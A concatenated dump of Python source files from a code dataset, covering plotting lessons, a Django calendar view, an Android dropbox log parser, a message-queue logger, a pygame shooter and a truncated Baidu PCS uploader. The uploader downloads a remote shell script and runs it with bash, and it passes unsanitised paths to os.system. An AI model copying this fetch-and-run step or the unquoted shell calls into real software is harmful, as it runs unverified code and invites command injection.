ticks\nplt.xticks([-np.pi, -np.pi/2, 0, np.pi/2, np.pi],\n [r'$-\\pi$', r'$-\\pi/2$', r'$0$', r'$+\\pi/2$', r'$+\\pi$'])\n\n# Set y limits\nplt.ylim(c.min()*1.1, c.max()*1.1)\n\n# Set y ticks\nplt.yticks([-1, 0, 1])\n\nax = plt.gca()\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\nax.spines['bottom'].set_position(('data', 0))\nax.xaxis.set_ticks_position('bottom')\nax.spines['left'].set_position(('data', 0))\nax.yaxis.set_ticks_position('left')\n\n# Show result on screen\nplt.show()\n","sub_path":"docs/lessons/lesson08_annotate.py","file_name":"lesson08_annotate.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"456688780","text":"# from django.shortcuts import render\nfrom datetime import timedelta\nfrom django.http import HttpResponse\nfrom gottesdienste.models import Gottesdienst\nfrom ics import Calendar, Event\n\ndef gottesdienste(request):\n c = Calendar(events=gottesdienste_as_events())\n response = HttpResponse(content_type='text/calendar')\n response['Content-Disposition'] = 'attachment; filename=\"Gottesdienste.ics\"'\n response.write(c)\n return response\n\ndef gottesdienste_as_events():\n gd = Gottesdienst.objects.all()\n return [Event(name=g.titel, \n begin=g.datum, \n duration=timedelta(minutes=g.dauer), \n description=g.freitext, \n location=g.ort or u\"Thomaskirche Kempen\")\n for g in gd]\n","sub_path":"kalender/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"314763377","text":"import csv\nimport os\nimport re\n\nfrom lxml import etree\n\nimport config\n\n\ndef match_regex(pattern, string, position=0, tuple_pos=0):\n m = re.findall(pattern, string)\n if m:\n if position <= len(m) + 1:\n if isinstance(m[position], tuple):\n if tuple_pos <= len(m[position]) + 1:\n return m[position][tuple_pos].strip()\n else:\n return m[position].strip()\n return ''\n\n\ndef write_csv(filename, content, keys=[]):\n create_directory_if_not_exists(filename)\n with open(filename, 'w') as file:\n writer = csv.DictWriter(file, keys, delimiter=';')\n writer.writeheader()\n writer.writerows(content)\n\n\ndef create_directory_if_not_exists(filename):\n directory = os.path.dirname(filename)\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef write_xml(values):\n for value in values:\n xml_path = re.sub(r'^/', '',\n re.sub(r'docx|doc|pdf$', 'xml', value['path']))\n xml_path = os.path.join(config.XML_FOLDER_PATH, xml_path)\n\n root = etree.Element('root')\n for key, val in value.items():\n node = etree.SubElement(root, key)\n node.text = val\n\n write_file(xml_path,\n etree.tostring(root, pretty_print=True, encoding='unicode'))\n\n\ndef write_file(filename, content):\n create_directory_if_not_exists(filename)\n with open(filename, 'w') as file:\n file.write(content)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"148117091","text":"#!/usr/bin/env python3\n\n\"\"\"A simple dropbox parser\n\nThis is a simple tool that can parse errors in android dropbox and\nprint errors on stardand output, The errors are stored in a global\ndict variable named \"result\".\n\"\"\"\n\nimport os\nimport sys\nimport re\nimport gzip\nimport shutil\nimport time\n\nfrom datetime import datetime\n\n# 'result' variable has the following structure:\n#\n# {\"UNKNOWN_RESET\" : [time, ...],\n# \"FRAMEWORK_REBOOT\" : [time ...],\n# \"SYSTEM_RESTART\" : [time, ...],\n# \"SYSTEM_BOOT\" : [time, ...],\n# \"system_server_watchdog\" : [time ...],\n# \"system_server_crash\" : [time ...],\n# \"SYSTEM_FSCK\" : [time, ...],\n# \"system_server_anr\" : [time ...],\n# \"system_app_crash\" : {\"packagename\" : [time ...], ...},\n# \"system_app_native_crash\" : {\"packagename\" : [time ...], ...},\n# \"data_app_native_crash\" : {\"packagename\" : [time ...], ...},\n# \"data_app_crash\" : {\"packagename\" : [time ...], ...},\n# \"system_app_anr\" : {\"packagename\" : [time, ...], ...},\n# \"data_app_anr\" : {\"packagename\" : [time, ...], ...},\n# \"SYSTEM_TOMBSTONE\" : {\"packagename\" : [time, ...], ...},\n# \"system_app_wtf\" : {\"packagename\" : [time, ...], ...},\n# \"SYSTEM_LAST_KMSG\" : [time, ...],\n# \"SYSTEM_RECOVERY_KMSG\" : [time, ...],\n# \"SYSTEM_AUDIT\" : [time, ...],\n# \"system_server_wtf\" : [time, ...]\n# }\nresult = {}\nverbose = False\ndropboxpath = \"\"\n\n\ndef usage():\n print(\"Usage: python \" + sys.argv[0] + \" [-v] \\n\")\n print(\" [-v]: Verbose output, default not\")\n print(\" : Path to the dropbox, which is Mandatory\")\n\n\ndef has_timestamp(filename):\n pathname = os.path.join(dropboxpath, filename)\n if os.path.isdir(pathname):\n return False\n if re.search(r\"[0-9]{1,}\", filename):\n return True\n else:\n return False\n\n\ndef gettime_readable(filename):\n \"\"\"return a human readable time string\"\"\"\n unix_time = gettime_unix(filename)\n return datetime.fromtimestamp(int(unix_time[:-3])).isoformat(\" \")\n\n\ndef gettime_unix(filename):\n m = re.search(r\"[0-9]{1,}\", filename)\n return m.group(0)\n\n\ndef unix_to_readable(unix_time):\n time_local = time.localtime(int(unix_time[:-3]))\n return time.strftime(\"%Y-%m-%d %H:%M:%S\", time_local)\n\n\ndef get_pkgname_sys_app_crash(pathname):\n with open(pathname, errors='ignore') as f:\n firstline = f.readline()\n return firstline.split(\":\")[1].strip()\n\n\ndef get_pkgname_sys_app_anr(filepath):\n return get_pkgname_sys_app_crash(filepath)\n\n\ndef get_pkgname_data_app_anr(filepath):\n return get_pkgname_sys_app_crash(filepath)\n\n\ndef get_pkgname_data_app_crash(filepath):\n return get_pkgname_sys_app_crash(filepath)\n\n\ndef get_pkgname_sys_app_native_crash(filepath):\n return get_pkgname_sys_app_crash(filepath)\n\n\ndef get_pkgname_data_app_native_crash(filepath):\n return get_pkgname_sys_app_crash(filepath)\n\n\ndef get_pkgname_system_tombstone(filepath):\n pkgname = \"UNKNOWN\"\n with open(filepath, errors='ignore') as f:\n for line in f:\n if \">>> \" in line:\n pkgname = line.split(\">>>\")[1].strip().split()[0]\n break\n return pkgname\n\n\ndef get_pkgname_sys_app_strictmode(filepath):\n return get_pkgname_sys_app_crash(filepath)\n\n\ndef get_pkgname_sys_app_wtf(filepath):\n return get_pkgname_sys_app_crash(filepath)\n\n\ndef ungzip(filename):\n \"\"\"extract gzip file\"\"\"\n subdir = filename[:-3]\n abs_filename = os.path.join(dropboxpath, filename)\n extract_to = os.path.join(dropboxpath, subdir)\n if os.path.exists(extract_to):\n shutil.rmtree(extract_to)\n uncompressfilename = os.path.join(extract_to, subdir)\n gzfile = gzip.GzipFile(mode='rb', fileobj=open(abs_filename, 'rb'))\n os.mkdir(extract_to)\n open(uncompressfilename, 'wb').write(gzfile.read())\n return uncompressfilename\n\n\ndef parse_time(filename):\n \"\"\"get time of the error\"\"\"\n pattern = filename.split(\"@\", 1)[0]\n times = []\n time = gettime_unix(filename)\n if pattern in result:\n times = result[pattern]\n times.append(time)\n else:\n times = [time]\n\n result[pattern] = times\n\n\ndef parse_pkgname(filename):\n \"\"\"get time and package name of the error event\"\"\"\n unix_time = gettime_unix(filename)\n if filename.endswith(\".gz\"):\n filepath = ungzip(filename)\n else:\n filepath = os.path.join(dropboxpath, filename)\n pattern = filename.split(\"@\", 1)[0]\n if pattern == \"system_app_crash\":\n packagename = get_pkgname_sys_app_crash(filepath)\n elif pattern == \"system_app_anr\":\n packagename = get_pkgname_sys_app_anr(filepath)\n elif pattern == \"data_app_crash\":\n packagename = get_pkgname_data_app_crash(filepath)\n elif pattern == \"data_app_anr\":\n packagename = get_pkgname_data_app_anr(filepath)\n elif pattern == \"system_app_native_crash\":\n packagename = get_pkgname_sys_app_native_crash(filepath)\n elif pattern == \"data_app_native_crash\":\n packagename = get_pkgname_data_app_native_crash(filepath)\n elif pattern == \"SYSTEM_TOMBSTONE\":\n packagename = get_pkgname_system_tombstone(filepath)\n elif pattern == \"system_app_strictmode\":\n packagename = get_pkgname_sys_app_strictmode(filepath)\n elif pattern == \"system_app_wtf\":\n packagename = get_pkgname_sys_app_wtf(filepath)\n\n if pattern not in result:\n result[pattern] = {}\n\n if packagename not in result[pattern]:\n result[pattern][packagename] = []\n\n if unix_time not in result[pattern][packagename]:\n result[pattern][packagename].append(unix_time)\n\n\ndef parse(filename):\n pattern = filename.split(\"@\", 1)[0]\n if pattern == \"UNKNOWN_RESET\" or \\\n pattern == \"FRAMEWORK_REBOOT\" or \\\n pattern == \"SYSTEM_RESTART\" or \\\n pattern == \"SYSTEM_BOOT\" or \\\n pattern == \"system_server_watchdog\" or \\\n pattern == \"system_server_crash\" or \\\n pattern == \"SYSTEM_FSCK\" or \\\n pattern == \"system_server_anr\" or \\\n pattern == \"SYSTEM_LAST_KMSG\" or \\\n pattern == \"SYSTEM_RECOVERY_KMSG\" or \\\n pattern == \"SYSTEM_AUDIT\" or \\\n pattern == \"system_server_wtf\":\n parse_time(filename)\n elif pattern == \"system_app_crash\" or \\\n pattern == \"data_app_crash\" or \\\n pattern == \"system_app_strictmode\" or \\\n pattern == \"system_app_anr\" or \\\n pattern == \"data_app_anr\" or \\\n pattern == \"system_app_native_crash\" or \\\n pattern == \"data_app_native_crash\" or \\\n pattern == \"SYSTEM_TOMBSTONE\" or \\\n pattern == \"system_app_wtf\":\n parse_pkgname(filename)\n else:\n #print(\"UNKNOW TYPE: \", pattern)\n pass\n\n\ndef print_result(result):\n \"\"\"print the result\"\"\"\n if result == {}:\n print(\"NO DROPBOX ERROR LOG FOUND!\")\n return\n format = \"%-50s%-30s%-10s\"\n print(format % (\"PACKAGE NAME\", \"TIME\", \"COUNT\"))\n print()\n for key, value in result.items():\n print(key.center(90, '-'))\n if type(value) == list:\n if not verbose:\n print(format % (key, unix_to_readable(value[-1]), len(value)))\n else:\n for i in range(len(value)):\n print(format % (key, unix_to_readable(value[i]), i+1))\n elif type(value) == dict:\n for p, t in value.items():\n if not verbose:\n print(format % (p, unix_to_readable(t[-1]), len(t)))\n else:\n for i in range(len(t)):\n print(format % (p, unix_to_readable(t[i]), i+1))\n print()\n\n\ndef main():\n if len(sys.argv) > 3:\n usage()\n sys.exit(-1)\n\n for arg in sys.argv[1:]:\n if arg == \"-v\":\n global verbose\n verbose = True\n elif os.path.isdir(arg):\n global dropboxpath\n dropboxpath = arg\n else:\n usage()\n sys.exit(-1)\n\n if dropboxpath == \"\":\n usage()\n sys.exit(-1)\n\n all_items = os.listdir(dropboxpath)\n files_with_timestamp = [x for x in all_items if has_timestamp(x)]\n\n for f in files_with_timestamp:\n parse(f)\n\n print_result(result)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"dropbox_parser.py","file_name":"dropbox_parser.py","file_ext":"py","file_size_in_byte":8246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"634391030","text":"from flask import Flask, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom os import environ\nimport requests\nfrom datetime import datetime\n\nimport json\nimport os\nimport amqp_setup\n\napp = Flask(__name__)\n \n\napp.config['SQLALCHEMY_DATABASE_URI'] = environ.get('dbURL') or 'mysql+mysqlconnector://root@localhost:3306/activity'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\nclass Activity(db.Model):\n __tablename__ = 'activity'\n id = db.Column(db.Integer, primary_key=True)\n activity_date_time = db.Column(db.DateTime, nullable=False)\n activity_type = db.Column(db.String(300), nullable=False)\n activity_name = db.Column(db.String(100), nullable=False)\n customer_id = db.Column(db.String(32), nullable=False)\n info = db.Column(db.String(1000), nullable=False)\n\nmonitorBindingKey='*.info'\n\ndef consume():\n amqp_setup.check_setup()\n queue_name = 'Activity_Log'\n amqp_setup.channel.basic_consume(queue=queue_name, on_message_callback=callback, auto_ack=True)\n amqp_setup.channel.start_consuming()\n\n\ndef callback(channel, method, properties, body): # required signature for the callback; no return\n print(\"\\nReceived an activity log by \" + __file__)\n processOrderLog(json.loads(body))\n print() # print a new line feed\n\n\ndef processOrderLog(order): \n print(\"Recording an activity log:\")\n\n activity_date_time = datetime.now()\n activity_type = order['type']\n activity_name = order['activity_name']\n customer_id = order['data']['customer_id']\n info = json.dumps(order)\n activity = Activity(activity_date_time=activity_date_time,activity_type=activity_type,activity_name=activity_name,customer_id=customer_id, info=info)\n db.session.add(activity)\n db.session.commit()\n\nif __name__ == \"__main__\": \n print(\"\\nThis is \" + os.path.basename(__file__), end='')\n print(\": monitoring routing key '{}' in exchange '{}' ...\".format(monitorBindingKey, amqp_setup.exchangename))\n consume()","sub_path":"activity_log.py","file_name":"activity_log.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"178084386","text":"\"\"\"\nAdvection equation\nFTCS and Lax-Friedrich methods\n\n@author: Ronan Legin\nFeb. 28th 2020\n\"\"\"\n\n# Include necessary packages\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Evolve f with the ftcs method\ndef evolve_ftcs(f,u,dx,dt):\n # By only changing the values within domain and not on boundary\n # i.e not f[0] or f[-1], then I'm keeping the boundary fixed.\n f[1:-1] = f[1:-1] - u*dt/(2*dx)*(f[2:] - f[:-2])\n return f\n\n# Evolve f with the Lax-Friedrich method\ndef evolve_lax(f,u,dx,dt):\n f[1:-1] = -u*dt/(2*dx)*(f[2:]-f[:-2]) + 1/2*(f[2:] + f[:-2])\n return f\n\n# Initialize scalar quantities\nnpix = 1000\nu = -0.1\ndx = 1.0\ndt = dx/(40.0*np.abs(u))\nsteps = 70000\n\n# Code for plotting\nplt.ion()\nfig, (ax1, ax2) = plt.subplots(1, 2)\nax1.set_title(\"FTCS\")\nax1.set_xlabel(\"x\",fontsize=14)\nax1.set_ylabel(\"f(x)\",fontsize=14)\nax2.set_title(\"LAX\")\nax2.set_xlabel(\"x\",fontsize=14)\nfig.set_size_inches(6, 5)\nfig.canvas.draw()\n\n# Initialize our function f for both ftcs and Lax-Friedrich methods\nx = np.arange(0,npix)*dx\nf_ftcs = np.arange(0,npix)*dx\nf_lax = np.arange(0,npix)*dx\n\np1, = ax1.plot(x,f_ftcs)\np2, = ax2.plot(x,f_lax)\n\nfor n in np.arange(0,steps):\n # First and only step is to evolve the function f using both methods\n f_ftcs = evolve_ftcs(f_ftcs,u,dx,dt)\n f_lax = evolve_lax(f_lax,u,dx,dt)\n\n if n%100 == 0:\n p1.set_ydata(f_ftcs)\n p2.set_ydata(f_lax)\n fig.canvas.draw()\n plt.pause(0.01)","sub_path":"advection.py","file_name":"advection.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"232301977","text":"from operation.util import HDFSSERVER, LOG\nimport json\nfrom sklearn.naive_bayes import ComplementNB\n\ndef Complement_Naive_Bayes(input_data_path_1, input_data_path_2,output_data_path, alpha, fit_prior, class_prior, norm):\n '''\n\n :param input_data_path_1:\n :param input_data_path_2:\n :param output_data_path:\n :param alpha: 1.0\n :param fit_prior: True\n :param class_prior: None\n :param norm: False\n :return:\n '''\n x_train, y_train, alpha, fit_prior, class_prior, norm = HDFSSERVER.load_data(input_data_path_1, input_data_path_2, alpha, fit_prior, class_prior, norm)\n CNB = ComplementNB()\n CNB.fit(x_train, y_train)\n ComplementNB(alpha, class_prior, fit_prior, norm)\n HDFSSERVER.save_model(output_data_path, CNB)\n LOG.info(\"function CNB run sucess\")\n result = json.dumps({'result' : 'success'})\n return result\n","sub_path":"TestForSkill/scikit_LearnOp/ComplementNaiveBayes.py","file_name":"ComplementNaiveBayes.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"503661676","text":"##########################################\n# Author: Manbir Singh Judge\n# Date: 12-7-2021 to 13-7-2021\n# Todo: Background Music, Help Menu, Settings Menu, Support for Arrow Keys, Different speed of ships, bullets of enemies become for powerfull and freqeunt and level increases\n# Tools Used ( except Comipler etc. ): Sublime Text 3\n##########################################\n\nimport pygame\nimport os\nimport time\nimport random\nimport sys\n\npygame.mixer.init()\npygame.font.init()\n\nWIDTH, HEIGHT = 750, 750\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption('Space Invader by Manbir Singh Judge')\n\n# Space Ships\nRED_SPACE_SHIP = pygame.image.load(os.path.join('assets', 'pixel_ship_red_small.png'))\nGREEN_SPACE_SHIP = pygame.image.load(os.path.join('assets', 'pixel_ship_green_small.png'))\nBLUE_SPACE_SHIP = pygame.image.load(os.path.join('assets', 'pixel_ship_blue_small.png'))\nYELLOW_SPACE_SHIP = pygame.image.load(os.path.join('assets', 'pixel_ship_yellow.png')) # Player's Ship\n\n# Lasers\nRED_LASER = pygame.image.load(os.path.join('assets', 'pixel_laser_red.png'))\nGREEN_LASER = pygame.image.load(os.path.join('assets', 'pixel_laser_green.png'))\nBLUE_LASER = pygame.image.load(os.path.join('assets', 'pixel_laser_blue.png'))\nYELLOW_LASER = pygame.image.load(os.path.join('assets', 'pixel_laser_yellow.png'))\n\n\n# Background\nBG = pygame.transform.scale(pygame.image.load(os.path.join('assets', 'background-black.png')), (WIDTH, HEIGHT))\n\n# SFX\nCHANNEL_0 = pygame.mixer.Channel(0)\nCHANNEL_1 = pygame.mixer.Channel(1)\nCHANNEL_2 = pygame.mixer.Channel(2)\n\nBOOM_SOUND = pygame.mixer.Sound('assets/sounds/boom.wav')\nSHOOT_SOUND = pygame.mixer.Sound('assets/sounds/laser_1.mp3')\nLOST_SOUND = pygame.mixer.Sound('assets/sounds/lost.mp3')\n\nclass Laser:\n\tdef __init__(self, x, y, img):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.img = img\n\t\tself.mask = pygame.mask.from_surface(self.img)\n\n\tdef draw(self, window):\n\t\twindow.blit(self.img, (self.x, self.y))\n\n\tdef move(self, vel):\n\t\tself.y += vel\n\n\tdef off_screen(self, height):\n\t\treturn not(self.y <= height and self.y >= 0)\n\n\tdef collision(self, obj):\n\t\treturn collide(self, obj)\n\n\nclass Ship:\n\tCOOLDOWN = 1 # How Fast Can you Shoot Lasers ( If FPS = 60 and COOLDOWN = 30, then Delay In Shooting will be Half a Second )\n\n\tdef __init__(self, x, y, health=100):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.health = health\n\t\tself.ship_img = None\n\t\tself.laser_img = None\n\t\tself.lasers = []\n\t\tself.cool_down_counter = 0\n\n\tdef draw(self, window):\n\t\twindow.blit(self.ship_img, (self.x, self.y))\n\n\t\tfor laser in self.lasers:\n\t\t\tlaser.draw(window)\n\n\tdef move_lasers(self, vel, obj):\n\t\tself.cooldown()\n\n\t\tfor laser in self.lasers:\n\t\t\tlaser.move(vel)\n\n\t\t\tif laser.off_screen(HEIGHT):\n\t\t\t\tself.lasers.remove(laser)\n\n\t\t\telif laser.collision(obj):\n\t\t\t\tobj.health -= 10\n\t\t\t\tself.lasers.remove(laser)\n\n\t# CONFUSE\n\tdef cooldown(self):\n\t\tif self.cool_down_counter >= self.COOLDOWN:\n\t\t\tself.cool_down_counter = 0\n\n\t\telif self.cool_down_counter > 0:\n\t\t\tself.cool_down_counter += 1\n\n\t# CONFUSE\n\tdef shoot(self):\n\t\tif self.cool_down_counter == 0:\n\t\t\tlaser = Laser(self.x, self.y, self.laser_img)\n\t\t\tself.lasers.append(laser)\n\n\t\t\tself.cool_down_counter = 1\n\n\t\t\tif self.ship_img == YELLOW_SPACE_SHIP:\n\t\t\t\tCHANNEL_0.play(SHOOT_SOUND)\n\n\n\tdef get_width(self):\n\t\treturn self.ship_img.get_width()\n\n\tdef get_height(self):\n\t\treturn self.ship_img.get_height()\n\n\nclass Player(Ship):\n\tdef __init__(self, x, y, health=100):\n\t\tsuper().__init__(x, y, health)\n \n\t\tself.ship_img = YELLOW_SPACE_SHIP\n\t\tself.laser_img = YELLOW_LASER\n\t\tself.mask = pygame.mask.from_surface(self.ship_img)\n\t\tself.max_health = health\n\n\tdef draw(self, window):\n\t\tsuper().draw(window)\n\n\t\tself.health_bar(window)\n\n\tdef move_lasers(self, vel, objs):\n\t\tself.cooldown()\n\n\t\tfor laser in self.lasers:\n\t\t\tlaser.move(vel)\n\n\t\t\tif laser.off_screen(HEIGHT): \n\t\t\t\tself.lasers.remove(laser)\n\n\t\t\telse:\n\t\t\t\tfor obj in objs:\n\t\t\t\t\tif laser.collision(obj):\n\t\t\t\t\t\tobjs.remove(obj)\n\n\t\t\t\t\t\tif laser in self.lasers:\n\t\t\t\t\t\t\tself.lasers.remove(laser)\n\n\t\t\t\t\t\tCHANNEL_1.play(BOOM_SOUND)\n\n\tdef health_bar(self, window):\n\t\tpygame.draw.rect(window, (255, 0, 0), (self.x, self.y + self.ship_img.get_height() + 10, self.ship_img.get_width(), 10))\n\t\tpygame.draw.rect(window, (0, 255, 0), (self.x, self.y + self.ship_img.get_height() + 10, self.ship_img.get_width() * (self.health / self.max_health), 10))\n\n\nclass Enemy(Ship):\n\tCOLOR_MAP = {\n\t\t'red': (RED_SPACE_SHIP, RED_LASER),\n\t\t'blue': (BLUE_SPACE_SHIP, BLUE_LASER),\n\t\t'green': (GREEN_SPACE_SHIP, GREEN_LASER),\n\t}\n\n\tdef __init__(self, x, y, color, health=100):\n\t\tsuper().__init__(x, y, health)\n\n\t\tself.ship_img, self.laser_img = self.COLOR_MAP[color]\n\t\tself.mask = pygame.mask.from_surface(self.ship_img)\n\n\tdef move(self, vel):\n\t\tself.y += vel\n\n\tdef shoot(self):\n\t\tif self.cool_down_counter == 0:\n\t\t\tlaser = Laser(self.x, self.y, self.laser_img)\n\t\t\tself.lasers.append(laser)\n\n\t\t\tself.cool_down_counter = 1\n\n\ndef collide(obj1, obj2):\n\toffset_x = obj2.x - obj1.x\n\toffset_y = obj2.y - obj1.y\n\n\treturn obj1.mask.overlap(obj2.mask, (offset_x, offset_y)) != None # (x, y)\n\n\ndef main():\n\trun = True\n\tFPS = 60\n\n\tlevel = 0\n\tlives = 5\n\n\tmain_font = pygame.font.SysFont('comicsans', 50)\n\tlost_font = pygame.font.SysFont('comicsans', 70)\n\n\tenemies = []\n\twave_lenght = 5 # Number on Enemies in Each Level ( will be Increased as Level Increases )\n\n\tenemy_vel = 1\n\tplayer_vel = 5\n\tlaser_vel = 7 # Speed of Lasers\n\n\tplayer = Player(300, 630)\n\n\tclock = pygame.time.Clock()\n\n\tlost = False\n\tlost_count = 0\n\n\t# Added by Me\n\tnew_wave_comming = True\n\tnew_wave_comming_count = 0\n\t# new_wave_blink = False\n\n\tdef redraw_window():\n\t\tWIN.blit(BG, (0, 0))\n\n\t\t# Draw Enemies\n\t\tfor enemy in enemies:\n\t\t\tenemy.draw(WIN)\n\n\t\t# Draw Ship\n\t\tplayer.draw(WIN)\n\n\t\t# Draw Text\n\t\tlives_label = main_font.render(f'Lives: {lives}', 1, (255, 255, 255))\n\t\tlevel_label = main_font.render(f'Level: {level}', 1, (255, 255, 255))\n\n\t\tWIN.blit(lives_label, (10, 10))\n\t\tWIN.blit(level_label, (WIDTH - level_label.get_width() - 10, 10))\n\n\t\t# Drawing Wave Label\n\t\tif new_wave_comming:\n\t\t\tnew_wave_label = main_font.render('New Wave Comming', 1, (255, 89, 0))\n\t\t\tWIN.blit(new_wave_label, (WIDTH / 2 - new_wave_label.get_width() / 2, 10))\n\n\t\t# Drawing Lost Label\n\t\tif lost:\n\t\t\tlost_label = lost_font.render('You Lost!', 1, (255, 0, 0))\n\t\t\tWIN.blit(lost_label, (WIDTH / 2 - lost_label.get_width() / 2, 350))\n\n\t\tpygame.display.update()\n\n\twhile run:\n\t\tclock.tick(FPS)\n\n\t\tif lives <= 0 or player.health <= 0:\n\t\t\tlost = True\n\n\t\tif lost:\n\t\t\tchannel_2_busy = pygame.mixer.Channel(2).get_busy()\n\t\t\tif channel_2_busy != True:\n\t\t\t\tCHANNEL_2.play(LOST_SOUND)\n\n\t\t\tif lost_count > FPS * 3:\n\t\t\t\trun = False\n\n\t\t\telse:\n\t\t\t\tlost_count += 1\n\t\t\t\tredraw_window()\n\n\t\t\t\tcontinue\n\n\n\t\tif new_wave_comming:\n\t\t\tif new_wave_comming_count > FPS * 3:\n\t\t\t\tnew_wave_comming = False\n\t\t\t\tnew_wave_comming_count = 0\n\n\t\t\telse:\n\t\t\t\tnew_wave_comming_count += 1\n\n\t\tif len(enemies) == 0:\n\t\t\tlevel += 1\n\t\t\twave_lenght += 2 # How much the Wave Would be Bigger when New Level Starts ( Original: 5 )\n\n\t\t\tnew_wave_comming = True\n\n\t\t\tfor i in range(wave_lenght):\n\t\t\t\tenemy = Enemy(random.randrange(50, WIDTH-100), random.randrange(-1500, -100), random.choice(['red', 'blue', 'green']))\n\t\t\t\tenemies.append(enemy)\n\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tsys.exit()\n\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_q:\n\t\t\t\t\tsys.exit()\n\n\t\t\t\tif event.key == pygame.K_ESCAPE:\n\t\t\t\t\trun = False\n\n\t\tkeys = pygame.key.get_pressed()\n\n\t\tif keys[pygame.K_a] and player.x - player_vel > 0: # Left\n\t\t\tplayer.x -= player_vel\n\n\t\tif keys[pygame.K_d] and player.x + player_vel + player.get_width() < HEIGHT: # Right\n\t\t\tplayer.x += player_vel\n\n\t\tif keys[pygame.K_w] and player.y - player_vel > 0: # Up\n\t\t\tplayer.y -= player_vel\n\n\t\tif keys[pygame.K_s] and player.y + player_vel + player.get_height() + 20 < HEIGHT: # Down\n\t\t\tplayer.y += player_vel\n\n\t\tif keys[pygame.K_SPACE]:\n\t\t\tplayer.shoot()\n\n\t\tfor enemy in enemies[:]:\n\t\t\tenemy.move(enemy_vel)\n\t\t\tenemy.move_lasers(laser_vel, player)\n\n\t\t\tif random.randrange(0, 2 * 60) == 1:\n\t\t\t\tenemy.shoot()\n\n\t\t\tif collide(enemy, player):\n\t\t\t\tplayer.health -= 20\n\t\t\t\tenemies.remove(enemy)\n\n\t\t\telif enemy.y + enemy.get_height() > HEIGHT:\n\t\t\t\tlives -= 1\n\t\t\t\tenemies.remove(enemy)\n\n\t\tplayer.move_lasers(-laser_vel, enemies)\n\n\t\tredraw_window()\n\n\ndef main_menu():\n\ttitle_font = pygame.font.SysFont('comicsans', 70)\n\n\trun = True\n\n\twhile run:\n\t\tWIN.blit(BG, (0, 0))\n\n\t\ttitle_label = title_font.render(\"Press Any Button to Begin ...\", 1, (255, 255, 255))\n\t\tWIN.blit(title_label, (WIDTH / 2 - title_label.get_width() / 2, 350))\n\n\t\tpygame.display.update()\n\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\trun = False\n\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_q or event.key == pygame.K_ESCAPE:\n\t\t\t\t\trun = False\n\n\t\t\t\telse:\n\t\t\t\t\tmain()\n\n\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\tmain()\n\n\n\tpygame.quit()\n\n\nif __name__ == \"__main__\":\n\tmain_menu()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"83698048","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport os\nimport requests\n\nclass Pcsdr:\n\n def __init__(self, local_dir=None, remote_dir=None):\n self.__local_dir = local_dir\n self.__remote_dir = remote_dir\n #\n self.__new_dirs = []\n #\n self.__new_files = []\n\n\n def get_dirs_and_files(self, local_dir=None):\n if local_dir:\n self.__local_dir = local_dir\n for root, dir, files in os.walk(self.__local_dir):\n self.__new_dirs.append(root)\n for filepath in files:\n self.__new_files.append(os.path.join(root, filepath))\n\n def check_pcs(self):\n pcs_exists = os.popen3('which pcs')[1].read()\n if not pcs_exists:\n pcs_addr = 'https://raw.githubusercontent.com/whatwewant/pScript/master/shell/config_pcs.sh'\n with open('/tmp/pcs.sh', 'wb') as f:\n f.write(requests.get(pcs_addr))\n os.system('bash /tmp/pcs.sh')\n\n def mkdir_in_bdwp(self):\n for dir in self.__new_dirs:\n dir = dir.replace(self.__local_dir, '', 1)\n # print self.__remote_dir\n #print dir\n #print os.path.join(self.__remote_dir, dir)\n remote_full_path = (self.__remote_dir + '/' + dir).replace('//', '/')\n if not os.popen3('pcs meta %s' % remote_full_path)[1].read():\n status = os.system('pcs mkdir %s' % remote_full_path)\n if not status:\n print('pcs mkdir %s succeeded.' % remote_full_path)\n else:\n print('pcs mkdir %s failed.' % remote_full_path)\n else:\n print('remote_dir %s already exists' % remote_full_path)\n\n def upload_files_to_bdwp(self):\n for absolte_path_file in self.__new_files:\n remote_full_path = self.__remote_dir + '/' + absolte_path_file.replace(self.__local_dir, '', 1)\n remote_full_path = remote_full_path.replace('//', '/')\n os.system('pcs upload '+ absolte_path_file + ' ' + remote_full_path)\n\n def run(self):\n self.check_pcs()\n self.get_dirs_and_files()\n self.mkdir_in_bdwp()\n self.upload_files_to_bdwp()\n\nif __name__ == '__main__':\n import sys\n\n if len(sys.argv) != 3:\n sys.stdout.write('Error Usage !!!\\n')\n sys.stdout.write('Usage:\\n')\n sys.stdout.write('\\t %s local_dir remote_dir\\n\\n' % sys.argv[0])\n sys.exit(-1)\n\n if not os.path.exists(sys.argv[1]):\n sys.stdout.write('Error: 